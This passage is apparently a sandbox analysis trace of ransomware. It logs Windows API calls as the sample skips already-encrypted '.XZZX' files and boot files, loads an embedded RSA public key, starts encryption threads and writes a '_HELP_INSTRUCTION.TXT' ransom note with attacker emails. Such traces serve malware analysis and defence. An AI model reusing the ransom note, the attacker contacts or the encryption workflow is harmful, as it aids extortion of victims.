MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.114] lstrcpyW (in: lpString1=0x17be7c, lpString2="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" | out: lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" [0186.114] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.114] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc0c [0186.114] Sleep (dwMilliseconds=0x96) [0186.270] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0186.270] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0186.270] lstrcmpW (lpString1="A191878831212978B3B60CE1354E0DC0.XZZX", lpString2="..") returned 1 [0186.270] lstrcmpW (lpString1="A191878831212978B3B60CE1354E0DC0.XZZX", lpString2=".") returned 1 [0186.270] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0186.270] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="ntldr") returned 0x0 [0186.270] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="NTLDR") returned 0x0 [0186.270] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0186.270] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0186.270] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0186.270] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") [0186.270] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.270] lstrcpyW (in: lpString1=0x17be7c, lpString2="A191878831212978B3B60CE1354E0DC0.XZZX" | out: lpString1="A191878831212978B3B60CE1354E0DC0.XZZX") returned="A191878831212978B3B60CE1354E0DC0.XZZX" [0186.270] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.270] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc10 [0186.271] Sleep (dwMilliseconds=0x96) [0186.426] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0186.426] lstrcmpW (lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpString2="..") returned 1 [0186.426] lstrcmpW (lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpString2=".") returned 1 [0186.427] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0186.427] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="ntldr") returned 0x0 [0186.427] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="NTLDR") returned 0x0 [0186.427] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0186.427] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0186.427] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0186.427] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") [0186.427] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.427] lstrcpyW (in: lpString1=0x17be7c, lpString2="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" | out: lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" [0186.427] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.427] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc14 [0186.428] Sleep (dwMilliseconds=0x96) [0186.581] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0186.581] lstrcmpW (lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpString2="..") returned 1 [0186.581] lstrcmpW (lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpString2=".") returned 1 [0186.581] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0186.581] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="ntldr") returned 0x0 [0186.581] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="NTLDR") returned 0x0 [0186.582] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0186.582] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="ntdetect.com") returned 0x0 [0186.582] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0186.582] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") [0186.582] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.582] lstrcpyW (in: lpString1=0x17be7c, lpString2="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" | out: lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" [0186.582] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.582] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc18 [0186.582] Sleep (dwMilliseconds=0x96) [0186.738] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0186.738] lstrcmpW (lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpString2="..") returned 1 [0186.738] lstrcmpW (lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpString2=".") returned 1 [0186.738] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0186.738] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="ntldr") returned 0x0 [0186.738] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="NTLDR") returned 0x0 [0186.738] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0186.738] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0186.738] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0186.738] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") [0186.739] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.739] lstrcpyW (in: lpString1=0x17be7c, lpString2="E003588E3DA0B59DC1493EC641B899E5.XZZX" | out: lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX") returned="E003588E3DA0B59DC1493EC641B899E5.XZZX" [0186.739] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.739] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc1c [0186.739] Sleep (dwMilliseconds=0x96) [0186.893] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0186.893] lstrcmpW (lpString1="EED603F80D860CC870D6498A119DF110.XZZX", lpString2="..") returned 1 [0186.893] lstrcmpW (lpString1="EED603F80D860CC870D6498A119DF110.XZZX", lpString2=".") returned 1 [0186.893] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0186.893] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="ntldr") returned 0x0 [0186.893] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="NTLDR") returned 0x0 [0186.894] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0186.894] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="ntdetect.com") returned 0x0 [0186.894] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned 59 [0186.894] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") [0186.894] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0186.894] lstrcpyW (in: lpString1=0x17be7c, lpString2="EED603F80D860CC870D6498A119DF110.XZZX" | out: lpString1="EED603F80D860CC870D6498A119DF110.XZZX") returned="EED603F80D860CC870D6498A119DF110.XZZX" [0186.894] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0186.894] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xc20 [0186.894] Sleep (dwMilliseconds=0x96) [0187.049] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0187.049] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0187.049] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0187.049] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0187.049] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0187.050] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0187.050] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0187.050] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0187.050] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*" [0187.050] SetErrorMode (uMode=0x1) returned 0x1 [0187.050] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\_HELP_INSTRUCTION.TXT") returned 76 [0187.050] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0187.050] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0187.051] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xc24) returned 0x0 [0187.051] RegQueryValueExW (in: hKey=0xc24, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43aecb8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43aecb8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0187.051] RegCloseKey (hKey=0xc24) returned 0x0 [0187.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0187.051] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0187.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc24 [0187.051] CloseHandle (hObject=0xc24) returned 1 [0187.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0187.051] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0187.051] lstrcpyW (in: lpString1=0x17b644, lpString2="auOsV3M 9VtNbJuKze" | out: lpString1="auOsV3M 9VtNbJuKze") returned="auOsV3M 9VtNbJuKze" [0187.051] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0187.052] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0187.052] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0187.052] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0187.052] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0187.052] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0187.052] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0187.052] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0187.052] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0187.052] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0187.052] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0187.052] lstrcmpW (lpString1="9Y_m-oVB2IyYX", lpString2="..") returned 1 [0187.052] lstrcmpW (lpString1="9Y_m-oVB2IyYX", lpString2=".") returned 1 [0187.052] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze" [0187.052] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0187.052] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\", lpString2="9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0187.052] SetErrorMode (uMode=0x1) returned 0x1 [0187.052] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0187.052] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="C:\\Users\\5p5NrGJn0jS 